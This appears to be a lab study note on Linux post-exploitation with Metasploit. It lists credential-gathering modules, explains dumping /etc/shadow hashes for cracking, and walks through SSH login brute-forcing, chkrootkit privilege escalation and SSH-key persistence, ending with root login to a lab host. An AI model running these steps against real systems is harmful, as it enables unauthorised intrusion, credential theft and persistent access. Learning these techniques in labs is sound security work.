Linux Post Exploitation

Linux Post Exploitation

Navigation

Sections in This Note


Enumerating Linux System Information

Some post exploits:

post/linux/gather/enum_configs
post/multi/gather/env
post/linux/gather/enum_network
post/linux/gather/enum_protections
post/linux/gather/enum_system
post/linux/gather/checkcontainer
post/linux/gather/checkvm
post/linux/gather/enum_users_history
post/multi/manage/system_session
post/linux/manage/download_exec
post/multi/gather/ssh_creds
post/multi/gather/docker_creds
post/linux/gather/hashdump
post/linux/gather/ecryptfs_creds
post/linux/gather/enum_psk
post/linux/gather/enum_xchat
post/linux/gather/phpmyadmin_credsteal
post/linux/gather/pptpd_chap_secrets
post/linux/manage/sshkey_persistence

Dumping Hashes with Hashdump

We can dump Linux user hashes with the hashdump post exploitation module. Linux password hashes are stored in /etc/shadow and can only be accessed by root or a user with root privileges. The hashdump module can dump user account hashes from /etc/shadow and can also unshadow hashes for password cracking with John the Ripper.

Establishing Persistence on Linux

msfconsole
# (consider SSH vulnerability)
use auxiliary/scanner/ssh/ssh_login
set USERNAME (name)
set PASSWORD (password)
exploit

sessions -u 1

In order to use the Metasploit persistence modules, we first need to elevate our privileges on the Linux target. The target has a vulnerable version of chkrootkit installed, vulnerable to privilege escalation, exploitable through a Metasploit module.

use exploit/unix/local/chkrootkit
set SESSION 2
set CHKROOTKIT /bin/chkrootkit
set LHOST (IPaddress)
exploit

sessions -u 3

Now that we've elevated our privileges, we can establish persistence. The best module for this is sshkey_persistence.

use post/linux/manage/sshkey_persistence
set SESSION 4 (session num)
set CREATESSHFOLDER true
exploit
loot

As shown, the loot command reveals the location of the private key that can be used to authenticate with the target system via SSH without providing a password.

msf5 post(linux/manage/sshkey_persistence) > loot
Loot
====

host          service  type     name         content     info                       path
----          -------  ----     ----         -------     ----                       ----
192.182.80.3           id_rsa   ssh_id_rsa   text/plain  OpenSSH Private Key File  /root/.msf4/loot/20211127225655_Linux_persistenc_192.182.80.3_id_rsa_891312.txt

In order to use the private key, view the content of the loot file, copy the key, and save it as a new file — in this case, in the home directory of the root user on Kali as ssh_key. Then assign appropriate permissions:

Command:
chmod 0400 ssh_key

Authenticate with the target using the private key via SSH:

Command:
ssh -i ssh_key root@192.182.80.3

Metasploit GUIs

Powered by Forestry.md